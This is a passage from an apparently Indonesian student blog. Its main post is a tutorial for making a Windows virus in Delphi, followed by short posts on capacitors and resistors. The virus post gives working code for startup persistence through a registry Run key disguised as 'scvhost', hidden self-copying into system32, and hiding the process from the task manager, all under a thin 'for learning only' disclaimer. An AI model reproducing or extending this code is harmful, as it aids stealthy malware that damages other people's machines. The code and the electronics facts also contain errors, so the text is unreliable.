PADIL FT-UNP

KEJUJURAN ADALAH KUNCI SUKSES

KAPASITOR

PENGERTIAN KAPASITOR
PENGERTIAN RESISTOR

Iklan

Oktober 26, 2009 Posted by | 589128 | Tinggalkan komentar

CARA MEMBUAT VIRUS DENGAN DELPHI

Bagi kamu yang hobi dengan pemograman komputer,gak ada salahnya dong kalau kamu mencoba dan mempelajari cara-cara membuat virus dengan menggunakan delphi.Oke,,,kali ini penulis gak akan ngomong panjang lebar tapi yang harus kamu inget,Tujuan saya membuat tulisan ini hanya dengan tujuan pembelajaran dan jangan pernah mencobakan virus ini kekomputer orangalin.Stop,,,,,,,,!Padil tadikan udah janji gak akan panjang lebar.Oke langsung aja ni Padil kasih kode programnya.

Tambahkan uses registry pada klausa uses.

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs;

Coba kita buat agar aplikasi kita ini di jalankan ketika computer pertama kali jalan (ini hanya contoh
silahkan kembangkan )

Procedure Tform1.FormCreate(Sender: TObject);
var
Reg: TRegistry;
begin
Reg := TRegistry.Create;
try
Reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey(‘\Software\Microsoft\Windows\CurrentVersion\Run’,true);
reg.WriteString(‘scvhost’, Application.ExeName);
reg.CloseKey;
finally
reg.free;
end;
end;
Simpan project anda kemudian jalankan, jika sudah dijalankan coba logoff kemudian masuk lagi ato restart
ato masuk ke msconfig dan lihat hasilnya. Mudah kan, untuk nilai-nilai yang lain silahkan anda coba
sendiri…
Biasanya virus lokal ketika jalan melakukan duplikasi diri ? pake Delphi bisa gak sih? Bisa banget, nah klo
pake delhpi gini caranya :
Misalnya kita pake komponen timer dengan property interval 50000  maksudnya melakukan proses copy
file tiap 5 detik
…..
Begin
copyFile(PAnsiChar(‘.\’+ExtractFileName(application.ExeName)),’C:\Windows\system32\mangga3.exe’,false);
FileSetAttr(‘C:\Windows\mangga3.exe’,faHidden);
end;
tar tinggal anda kembangkan yah…. Nilai atribut file dapat juga anda modifikasi ! baca aja di help bawaan
Delphi untuk mengetahi nilai2 apa aja sih yang ada
So sweat 
Biasanya kan virus gak bisa kelihat di task manager ? trus klo di shift+tab juga gak ada trus biasanya
aplikasi virus ketika aktif gak kelihatan, klo pake Delphi bisa gak? Hehehe Delphi gitu loh ya iyalah malah
programnya hanya 2 baris lagi
Bwt project baru kemudian buka project-nya caranya tekan ctrl+F12 trus pilih projectnya nanti akan
muncul seperti tampiln project1 di bawah ini :
program Project1;
uses
Forms,
Unit1 in ‘Unit1.pas’ {Form1};
{$R *.res}
begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
end.
Setelah itu kita modifikasi sehingga berubah menjadi :
program Project1;
uses
Forms,
Unit1 in ‘Unit1.pas’ {Form1};
{$R *.res}
begin
Application.Initialize;
Application.Title:=”; //gak kelihatan di task manager
Application.CreateForm(TForm1, Form1);
Application.ShowMainForm:=false; // form utamanya gak kelihatan waktu prosesnya berjalan
Application.Run;
end.
Tuh simpelkan.Janngan lupa kritik & sarannya ya.
Padil tu masih belajar jadi tolong kritik dan sarannya ya.
padil tunggu komentarnya.Ok,,,,?

foto9281
PENULIS
M.PADIL

April 13, 2009 Posted by | 2.PEMOGRAMAN KOMPUTER MENGGUNAKAN DELPHI | Tinggalkan komentar

KAPASITOR

KAPASITOR
1.PENGERTIAN KAPASITOR
Kapasitor adalah komponen elektronika yang digunakan untuk menyimpan muatan listrik, dan secara sederhana terdiri dari dua konduktor yang dipisahkan oleh bahan penyekat (bahan dielektrik).Tiap konduktor di sebut keping.Kapsitor dalam ranagkaian Elektronika dilambangkan dengan huruf “C”.
Kapsitor pertama kali ditemukan oleh Michael Faraday (1791-1867).Kapasitor dapat meneruskan tegangan bolak balik (AC) akan tetapi menahan tegangan DC, besaran ukuran kekuatannya dinyatakan dalam FARAD (F).
2.JENIS-JENIS KAPASITOR
1. Kapasitor elektrolit
2. Kapasitor tantalum
3. Kapasitor Polister Film
4. Kapasitor Poliprolyene
5. Kapasitor Kertas
6. Kapasitor 7. Kapasitor 8. Kapasitor 9. Kapasitor
Mica Keramik Epoxy Variable

LAGI KULIAH BROOOO....!

April 11, 2009 Posted by | 1.KOMPONEN ELEKTRONIKA | Tinggalkan komentar

RESISTOR

RESISTOR
1.Pengertian Resistor
Resistor adalah salah satu komponen elekronika yang berfungsi untuk menahan arus dan tegangan yang mengalir dalam suatu rangkaian/sistim elekronika.
2.Karakteristik Resistor
Ada dua karakteristik resistor yang perlu di ketahui yaitu:
1. Nilai Resistansinya
Resistor mempunyai harga resistansi yang cukup banyak, mulai dari beberapa ohm di belakang koma sampai beberapa mega ohm didepan koma.
2. Rating Dayanya (Kemampuan untuk menahan arus yang mengalir pada resistor tersebut)
Rating daya yang tertinggi ada yang mencapai beberapa ratus watt dan yang terendah sampai mencapai 0,1watt rating daya sangat penting , sebab ia menunjukkan daya maksimum yang bisa di sipasikan tanpa menimbulkan panas-panas yang berlebihan yang dapat mengakibatkan kerusakan pada resistor tersebut.Disipasi artinya bahwa daya sebesar I2R akan di buang kepadanya. Panas yang berlebihan dapat mengakibatkan terbakarnya resistor.
3.Jenis-Jenis Resistor
Pada dasarnya resistor hanya dapat dibagi 2 yaitu :
1. Resistor tetap (Fixed resistor)
Resistor jenis ini mempunyai nilai resistansi yang tetap (tidak berubah)
2. Resistor Variabel (variable Resistor)
Resistor ini mempunyai nilai resistansi dapat berubah-ubah.
3. Resistor Non linier

3.1.Resistor Tetap (Fixed Resistor)
1. Resistor Wirewound.
resistor ini terbuat dari lilitan kawat, di mana kawatnya terbuat dari jenis nikel dan logam campuran untuk memperoleh nilai resistansi dengan koefisien temperature yang rendah, maka resistor ini dapat mempertahankan harga resistansi, toleransi, rating daya dan konfigurasi fisik yang lebih besar disbandingkan dengan tipe-tipe resistor yang lainnya.
Daya yang tersedia untuk resistor jenis ini yaitu mulai dari 5 watt sampai beberatus watt, dan range niali resistansi mulai dari kurang dari satu ohm hingga beberatus ohm.
2. Resistor Film
Resistor ini juga terbagi ada beberapa jenis berdasarkan jenis bahan filmnya, yaitu:
• Resistor Film yang terbuat dari logam
• Resistor film yang terbuat dari karbon (resistor inilah yang paling sering digunakan dalam rangkaian elektronika).Resistor Film dari karbon tersedia di pasaran dengan nilai dari 1 Ω sampai 1000 MΩ. Rating dayanya dari1/8 watt hinggga 6 watt.
3.2.Resistor Variable(Variable Resistor)
1.Resistor Peka Suhu(Thermistor)
Ada dua jenis yaitu NTC (Negative Temperature Coefficient) dan PTC (Positive Temperature Coefficient). NTC resistansinya kecil bila panas dan makin dingin makin besar. Sebaliknya PTC resistensi kecil bila dingin dan membesar bila panas.
2.LDR(Light Depending Resistor)
Ada lagi resistor jenis lain ialah LDR (Light Depending Resistor) yang nilai resistansinya tergantung pada sinar / cahaya.
4.Menurut Bahan Tahanan Dapat Dibedakan Atas:
1 Tahanan karbon
2 Tahanan kawat gulung
3 Tahanan serbuk besi
4.Fungsi Resitor
1 Untuk mengatur kuat arus listrik
2 Untuk membagi tegangan
3 Sebagai unsur pemanas pada alat – alat listrik
5.Kode Warna Resistor

WARNA NILAI TOLERANSI
Hitam 0 –1%—
Coklat 1 –2%—
Merah 2 —–
Orange 3 —–
Kuning 4 —–
Hijau 5 —–
Biru 6 —–
Ungu 7 —–
Abu-abu 8 —–
Putih 9 —–
Emas 0,1 10 %
Perak 0,01 1 %

PADIL

April 11, 2009 Posted by | 1.KOMPONEN ELEKTRONIKA | 2 Komentar

Hello world!

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!

April 11, 2009 Posted by | Uncategorized | 2 Komentar